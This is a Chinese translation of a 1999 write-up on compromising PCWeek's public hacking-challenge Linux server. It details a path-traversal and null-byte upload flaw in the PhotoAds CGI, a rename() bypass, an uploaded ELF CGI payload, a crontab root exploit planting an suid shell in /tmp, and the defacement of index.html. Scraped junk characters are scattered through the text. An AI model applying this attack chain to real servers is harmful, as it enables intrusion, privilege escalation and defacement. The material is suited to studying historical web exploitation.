JFS侵入PCWEEK-LINUX主機的詳細過程

譯者注：PCWeek-Linux 主機是著名電腦雜志 PCWeek 為了測試 WEB 服務(wù)器 IIS（NT平臺）
和 Apache（Linux平臺）的安全性，提供給黑客/駭客攻擊的兩臺主機之一。另一臺主機安裝
) M! ~9 c5 k0 C的是 IIS（NT平臺）。詳細情況請訪問網(wǎng)站：http://www.hackpcweek.com/。


' U5 |+ M$ c  N, K, F. l首先要進行的當然是——收集遠端主機信息：打開的端口和提供的網(wǎng)絡(luò)服務(wù)等。經(jīng)過掃
2 f* n7 S# q' s/ z4 I* J- `描后發(fā)現(xiàn)大多數(shù)端口都被過濾掉了，原因可能是安裝了防火墻或設(shè)置了 TCP-Wrapper 。所
以我們只能從 HTTP 服務(wù)器著手了。
$ K+ \4 g( p% {% S+ n3 Q: X/ p. @
$ U2 K) {) L/ q3 Elemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
9 _& s" m/ m. w$ B9 HConnected to securelinux.hackpcweek.com.
2 K' f0 e5 D4 G; H: S' F- xEscape character is '^]'.
POST X HTTP/1.0

HTTP/1.1 400 Bad Request
4 `* S, V3 B2 V( vDate: Fri, 24 Sep 1999 23:42:15 GMT
$ s0 Q: i4 }) C/ fServer: Apache/1.3.6 (Unix) (Red Hat/Linux)
7 C7 K& R+ C$ [3 j% U8 a(...)
% E9 j9 \% p; ?4 yConnection closed by foreign host.
/ ~- M( |$ [! r: \. a- Q, [lemming:~#

2 O& p6 `2 q* `! P/ _% i8 M. P% ?嗯，服務(wù)器操作系統(tǒng)是 Red Hat，WEB服務(wù)器是 Apache/1.3.6。從網(wǎng)頁上可知服務(wù)器安
裝了 mod_perl，但只有一個 fingerprint 功能，對我們沒有什么用處。
) [# c- j* S$ ]! S0 F) Z. P( LApache 1.3.6 本身沒有包含任何可供遠端用戶使用的CGI程序，但我們不清楚Red Hat
的發(fā)行版本中是否有，所以我們進行了一些測試（test-cgi, wwwboard, count.cgi等）。
結(jié)果令人失望。于是我們嘗試找出網(wǎng)站的結(jié)構(gòu)。經(jīng)過對該網(wǎng)站HTML頁的分析，終于找出
% G4 R% c6 m( O3 P5 X. z# m, j了網(wǎng)站DocumentRoot下的目錄結(jié)構(gòu)：
$ }2 a& C( _! h  K( M
9 k5 V/ \- D+ _/ ^7 ]. M/
/cgi-bin
/photoads/
7 T( D9 Z! d. K0 i- p/photoads/cgi-bin
5 [8 n  t7 m$ \
很自然地，我們的眼光落在 photoads 這個安裝模塊上。該商用CGI包可在"http://
  o1 {* d9 {  N+ c! P7 d& bwww.hoffoce.com"找到，價格為$149，包括供檢查和修改用的PERL源代碼。
我們找到一個朋友，了解和掌握 photoads 在 Linux 平臺上的安裝情況，從而大致清楚
運行在該主機上的 photoads。
檢查了缺省安裝的文件后，我們發(fā)現(xiàn)可以取得所有用戶名及其口令的數(shù)據(jù)庫（http://
securelinux.hackpcweek.com/photoads/ads_data.pl），但當我們試圖訪問配置文件
2 K5 Y9 R5 r) \& u: P/photoads/cgi-bin/photo_cfg.pl 時，服務(wù)器的設(shè)置拒絕了這個請求。
7 M& S* `+ d! b/ ^, C7 w通過 /photoads/cgi-bin/env.cgi，我們可以知道該服務(wù)器的許多詳細情況，如
- }# O: }0 O9 r4 @3 b' Y7 o8 BDocumentRoot 在文件系統(tǒng)的位置（/home/httpd/html），運行 Apache 服務(wù)器的用戶（
6 R8 h& m! K$ u; _, L9 q4 L' s: ~# e" v4 hnobody）等。
' |8 B2 v# w& e8 U現(xiàn)在，開始尋找漏洞的第一步，我們嘗試尋找是否存在 SSI 或 mod_perl 嵌入 HTML
! M! M7 e1 H9 v9 U命令的漏洞，如：
6 g$ x5 w- A* k
* k! Y* V1 @) d<!--#include file="..."--> for SSI
<!--#perl ...--> for mod_perl
( N( i+ u, W+ C+ G- p% e
但腳本中的匹配表達式卻在許多輸入域上過濾此類輸入。不過與此同時我們卻發(fā)現(xiàn)有一
個用戶賦值的變量在轉(zhuǎn)換成 HTML 代碼前，并沒有檢查其值的合法性。我們可以通過它將命
令嵌入到由服務(wù)器端解析的 HTML 代碼中：

! n9 d  ^0 s; X, @8 g6 G  W% }# w在 post.cgi，行 36：
$ ?. E2 _: T6 |' }5 U4 j/ Jprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";

$ENV{'HTTP_REFERER'}是一個用戶賦值的變量，我們可以通過它將任何 HTML 嵌入到代
/ e' y" _# o( g% n碼中。
請閱讀我們提供的文件 getit.ssi 和 getit.mod_perl。
0 h; g3 w; k+ \4 w1 C3 _& ~在命令行下使用這些文件如下：
6 U0 S8 E- g9 L2 c( O
lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

但不幸的是，該主機的配置并不允許 SSI 或 mod_perl，所以我們無法利用這個方法侵
7 a5 {: w" k* f. z9 M9 P入系統(tǒng)。
6 k2 `/ E- U& X1 f4 \
因此我們決定在CGI腳本中尋找缺口。在PERL腳本中許多漏洞往往出現(xiàn)在 open()、
system() 或 `` 等調(diào)用中，前一個允許讀/寫/執(zhí)行，而后兩個允許執(zhí)行。
雖然在該主機找不到后兩種調(diào)用，但我們卻發(fā)現(xiàn)了一些 open() 調(diào)用：
7 a2 C0 p; g) [; e& h" g* K1 y
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
% L' ]# Z" w  {( ?4 Oedit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
4 L8 ]" T, K& J4 l6 b5 R1 h* rphoto.cgi: open ( FILE, $filename );
: r0 F; ?1 A' B( }$ C* ^+ c(...)

. N: a0 @% O7 U" V$BaseDir 和 $DataFile 兩個變量是在配置文件中定義，且不能在運行時修改，無法被
) t2 g3 A2 D5 c/ u0 K# _7 H我們利用。
但其余兩個就……

$ [2 R. I% \3 d4 A' Q在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;

! u3 G& I- b0 M+ H3 b5 x0 v0 @open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
. X1 z- u0 M* T, Cprint ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);

因此，如果我們可以修改 $write_file 變量，就可以寫文件系統(tǒng)中的任何文件。
7 J) ~/ b2 q2 B1 i% z5 U$write_file 變量來自：

* \  C: z7 X4 Y3 s0 \$write_file = $Upload_Dir.$filename;
$ X$ o: K4 t+ S6 {, @
+ y% r& |- [5 H- o. z) r6 O0 O) y其中，$Upload_Dir 在配置文件中定義，我們無法修改，但 $filename 變量又如何呢？

在 photo.cgi，行 226：
+ f/ ]; P. B2 S4 s& {if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
6 F# U1 ~! W: ~5 `3 [
6 E. W! ~0 _' H- D+ Q6 v& r: P" q$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

6 A. Q# S9 D3 B+ T3 ?if ($filename =~ m/gif/) {
# b* T+ c2 e4 a: h$type = '.gif';
}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
1 m' W' f9 a6 k# \}else{
{&Not_Valid_Image}
}
' P. {' w5 z, v
由此可知，該變量來自從提交表格的變量組分解出來的 $UPLOAD{'FILE_NAME'}，而且必
須經(jīng)過匹配表達式過濾，因此我們不能用"../../../../../../../../etc/passwd"格式來取
得任何文件。匹配表達式為：

: u6 a+ H: c9 R8 T% I1 H. A$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

我們看到，如 $filename 與該表達式匹配，則返回ASCII碼1（SOH）。同時，變量還必
須包含"gif"或"jpg"，以通過 Not_Valid_Image 過濾器。
1 k( J( N& }; D9 v, G* L3 \經(jīng)過多次嘗試，以及從 Phrack 的關(guān)于PERL CGI安全性文章的幫助，我們發(fā)現(xiàn)以下格式

; K# l, R# D: j5 N/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
1 H) b7 d: X: O; N! p
+ F5 J( k% l3 [可以成功修改WEB服務(wù)器根目錄下的index.html文件。:-)
然而，為了上載文件，我們?nèi)皂毨@過更多的腳本代碼。我們發(fā)現(xiàn)無法通過POST方法發(fā)送
4 Z% b! D, ]* s1 R包含上述內(nèi)容的表格（無法轉(zhuǎn)換%00），唯一的方法只能是GET。
8 W" F. t- i$ b2 s1 g" ~在 photo.cgi ，行 256，會檢查被上載文件的內(nèi)容是否符合圖像定義（寬/長/大?。?font class="jammer">; L- r  v7 O, a! Z7 R, N) s1 K
（記住，photo.cgi 是被當作某個AD上載圖像的一個方法）。如果不符合這些細節(jié)，腳本將
1 L, W0 D4 D- n7 l- S刪除該上載文件。這當然不是我們所希望的！
- m, `9 X5 y3 W! zPCWeek 網(wǎng)站配置文件將 Imagesize 設(shè)為 0，所以我們可以忽略該腳本中有關(guān)JPG部分，
而將主要精力集中在GIF上。

if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
5 X+ _- _' x5 d, }, wread FILE, $head, 13;
. [5 H; r% H7 s1 m( ~(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
. k' w6 N0 p3 g& V2 R$PhotoHeight = $height;
! F& {0 q9 H7 ~  F" E" m  }$PhotoSize = $size;
return;
1 b9 N" A- Z/ F# F}
: {6 g2 V0 t+ V! V( ?: d5 V' U' C
6 @5 ^! T9 w0 t2 @在 photo.cgi，行 140：

0 I* _: I* V( D" g3 [& ~if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
* K: w4 D" W; r1 o; I9 d}
3 A( w5 w" q' a% j' D% f# O
( f8 }) ~: k/ z- V! J+ Cif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
, h8 C* y3 Y, \4 h& L
$ [1 |3 ~/ i  m由上可知，$PhotoWidth不能大于700，不能為空，且不能大于 $ImgWidth（缺省為350）
。
所以我們使 $PhotoWidth!="" 且 $Photowidth<350 即可。
對于 $PhotoHeight，則必須小于 $ImgHeight（缺省為250）。
  j# J8 t: h/ q& j4 G綜合以上要求，我們可以得到一個可以使用的數(shù)據(jù)：$PhotoWidth==$PhotoHeight==0。
0 r" B# C8 ]- {% Y( o研究提取該值的腳本后，我們唯一要做的就是將文件的第6至第9字節(jié)的值置為 ASCII 碼 0
  N, _$ G" l* i; T+ Z（NUL）。
在確保 FILE_CONTENT（文件內(nèi)容）符合以上所有要求后，我們又在以下代碼遇到了另一
個問題：

4 g0 O  @3 h* K" ^chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
5 n& q4 T) y' `: _rename("$write_file", "$Upload_Dir/$newname");
5 c9 G0 S5 ?  ^4 C; l
Show_Upload_Success($write_file);
+ S: F" M4 B* ~5 o& G0 d
哇！文件將被改名/移動（這可是我們絕對不希望的?。?font class="jammer">; I$ R( I2 g4 ]
查找 $AdNum 變量的最終處理過程，我們發(fā)現(xiàn)它只能包含數(shù)字：

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
3 Y- M5 `  T! P' h6 J# ]0 P3 v$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
& X4 R0 H2 ~& E" |: l$AdNum = $UPLOAD{'AdNum'};
* T/ m8 d% p2 |" X
其余的字符將被刪除。因此我們不能直接應(yīng)用"../../../"這種方法。
那么，應(yīng)該怎樣做呢？我們看到 rename() 函數(shù)需要兩個參數(shù)：舊的路徑和新的路徑。
" g" A/ M3 A3 f" X( c; T' V哈哈，在函數(shù)過程中沒有錯誤檢查！當函數(shù)出錯后將跳到下一行繼續(xù)執(zhí)行！那么如何才能使
該函數(shù)失敗呢？Linux 內(nèi)核對文件名長度限制為1024字節(jié)。因此如能使腳本將文件改名時新
4 y- u  k) c* _: f% Z文件名超過1024字節(jié)長，即可繞過這個過濾器。
所以，下一步就是要向系統(tǒng)傳遞一個大約1024字節(jié)長的AD號碼。但由于腳本僅允許我們
9 U- I  s0 |5 G) v/ e# M/ b發(fā)送對應(yīng)AD號碼已存在的圖片，而且由系統(tǒng)產(chǎn)生一個10^1024（10的1024次冪，即小數(shù)點前有
1024個數(shù)字——backend注）的AD號碼要花的時間對我們來說似乎太長了。;-)
我們又遇到另一個難題了！……
. t' C: O& C, o/ ]
我們發(fā)現(xiàn)輸入錯誤檢查函數(shù)可以幫助我們創(chuàng)建一個指定的AD號碼！瀏覽 edit.cgi 腳本
* B& [& E: Z! _$ `# |后，你也許就會想到：如果輸入是一個文件名+回車符+一個1024位的數(shù)字，會產(chǎn)生什么結(jié)果
呢？;-)
# G: f& y0 K; [請閱讀用于創(chuàng)建新AD值的程序文件 long.adnum。
5 x3 n, \8 Z2 x* H  N當成功繞過 $AdNum 的檢查后，我們就可以讓腳本創(chuàng)建/覆蓋用戶 nobody 有權(quán)寫的任何
0 B( b( _- {- A  R/ @7 Z文件，其中包含了我們所希望的東西（GIF頭部的NUL除外）。
+ d& l. F3 i' r) Q5 |( ]
6 h0 k+ y5 J  g: @( ~+ G1 z$ O現(xiàn)在就讓我們對該主機試一試這個方法。
嗯，so far so good（一切順利）。但當我們試圖讓腳本改寫 index.html 文件時無法
+ p& v  }. C; w% z8 f成功。:( 其中的原因可能是沒有覆蓋該文件的權(quán)限（該文件由root擁有）。


讓我們試一下是否還有其它入侵方法……
: n/ d- Z  u' Q( {' X( }1 I
0 c1 E( ?( X7 O& f0 F& |" v我們決定嘗試修改CGI程序，以使其按我們的意愿運行:)。這種方法還可以讓我們搜尋那
些“絕密”文件，然后拿出動賣。:)
+ l8 G/ r( G6 r. J我們修改了“覆蓋”腳本，并讓其成功地覆蓋了一個CGI！:) 為了不覆蓋那些較為重要
2 k* N* Y! B" J的CGI（這是提高隱蔽性的聰明法子——backend注），最后我們選擇了 advisory.cgi（你知
道它有什么用嗎？:)）
+ H3 H4 y- d% \- e7 U# D6 B% _7 Z現(xiàn)在，我們將要上載一個shell腳本，以便我們可以執(zhí)行一些命令。呵呵
& e9 @* e: m8 A/ Y% U$ R# ]) x然而，這個以CGI方式運行的shell腳本必須符合以下格式：

% M( R- S. e4 _#!/bin/sh
# L3 C. [- }, W& ~- |+ Iecho "Content-type: text/html"
find / "*secret*" -print

同時要記得，第6至第9字節(jié)必須為0或很小的值，以符合上面提及的大小定義……

0 H6 `) `1 K6 q( l  R& {. X#!/bi\00\00\00\00n/sh
( m: c! M9 S, {- P5 `' v
4 c1 E) d9 v8 |) O# Z1 ^$ H/ Y以上這種方法是行不通的，內(nèi)核只會讀取前5個字節(jié)（#!/bi）內(nèi)容并執(zhí)行。在該主機中
我們無法只用三個字節(jié)去獲得一個shell。又遇到難題了！:(

  I1 @+ a0 q/ n5 m1 J9 m$ [% w8 C讓我們看一下ELF（Linux缺省可執(zhí)行類型）二進制文件格式，就會發(fā)現(xiàn)那些位置字節(jié)的
8 O9 h0 y$ z8 _1 }# ~7 Q/ {8 S內(nèi)容均為0x00。:) Yohoo :)
解決了這個問題后，現(xiàn)在我們需要將這個ELF可執(zhí)行文件上載到遠端服務(wù)器中。注意，文
, ~) H1 N6 {! }# w; \件內(nèi)容必須經(jīng)過編碼，因為我們已知道只能通過GET方法上載，而不是POST。因此還要考慮到
URI的最大長度。Apache 服務(wù)器上URI最大長度設(shè)為8190字節(jié)。別忘了，我們還有一個很長的
1024字節(jié)的AD號碼，所以經(jīng)編碼后的ELF文件長度限制為大約7000字節(jié)。
. b8 x- C& q6 t9 e6 A* ~" C
以下這個程序：

7 A6 m7 |; D& c. [4 H) ^lemming:~/pcweek/hack/POST# cat fin.c
/ Y5 x: a0 q0 f. S#include <stdio.h>
main()
# B% _" @. y$ z* `  {5 d3 Q{
5 {. i3 ~) L9 t1 Z# J/ |  l! Oprintf("Content-type: text/html\n\n\r");
fflush(stdout);
" M! D5 W% E, w( u1 L! mexeclp("/usr/bin/find","find","/",0);
! p; K0 R. V* `7 O}
8 d7 ~  M2 c5 H$ @6 F- X
編譯后：
7 b4 W  l6 `! W  f8 Z
# G3 j$ c. H9 t$ e, y  v0 elemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
% j! k1 {0 A8 H. k  o7 y  L) q! N  F6 |8 F
0 m( J) u  q' g5 |  V優(yōu)化（清除symbols）后：
0 O2 n4 D) t1 D; }- O$ h
  D, m% B' B. G9 G# ?  Mlemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
5 X8 n0 k' c4 K0 S4 V2 H-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

; k4 U- F4 u0 ^" lURL編碼后：
. o: D' J9 J! O
3 Z: b. S  t- Qlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

$ n, d. t9 B: E* U0 {- y這個文件大小超過了限制值。:(
' g  d& @% W/ O8 u. I我們只能自行編輯二進制文件以盡量減小文件體積。這可不是一件輕松的工作，但卻有
效：
7 [7 e# P/ P; d  C9 |: I
1 r; p3 T) w% `" t5 ulemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
7 ?5 Y3 K8 U5 ^1 a3 y- ]% s-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
0 J; j9 F6 L& |" Q9 C( zlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#

請閱讀 get.sec.find文件，還有 to_url 腳本和用來運行一些基本命令的*.c文件。

現(xiàn)在，將這個CGI上載到服務(wù)器，再用瀏覽器訪問它，如：
9 @  H; N6 b8 m
wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi

+ X; b: x  U! z; c服務(wù)器返回的結(jié)果相當于在服務(wù)器上執(zhí)行 find / 命令。:)
但我們在該服務(wù)器中找不到任何“絕密”文件，或許是nobody用戶無權(quán)訪問的緣故。:(
: L- [, j0 o/ G7 N6 e# K: F/ q3 Q我們嘗試了更多的命令搜索，如ls等，但仍無法找到它們的蹤影。
[我懷疑這些文件是否真的保存在該服務(wù)器上！]
: w( C4 d7 J4 L$ g) O" p

好了，現(xiàn)在是獲取 root 權(quán)限的時候了。利用最新發(fā)現(xiàn)的 Red Hat crontab 漏洞就可以
9 ]( E! _4 F7 |3 {2 n輕松做到這一點。該漏洞詳情請參閱 Bugtraq 或 securityfocus 上相關(guān)文檔。
0 M! R4 a/ i) l. j( d& A4 d我們修改了源程序以適應(yīng)自己的需要，因為我們不需交互式 root shell，而是創(chuàng)建一個
' Z( Z! {2 G3 A  f# ?9 v+ R: i用戶 nobody 可訪問的 suid root shell，如 /tmp/.bs。我們再次上載該CGI，并運行它，
/ A, W: O$ w) b& B- v- i觀察其運行結(jié)果。
我們制作了執(zhí)行"ls /tmp"命令的CGI，執(zhí)行后確認我們已擁有了一個 suid root shell。
另外，我們還上載了一個文件 /tmp/xx，用于修改 index.html 文件。
( f3 }/ g( y3 N' X
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
& {9 s2 Z+ s9 i/ c' F% s8 [
9 J4 i; `: O" f- X. t好了。游戲結(jié)束！:)
; n& m6 N$ U. E- F6 J' l, Q總共花費了大約20個小時，還算不錯！呵呵。:)

4 a; p8 {) M9 L# V8 V* U1 }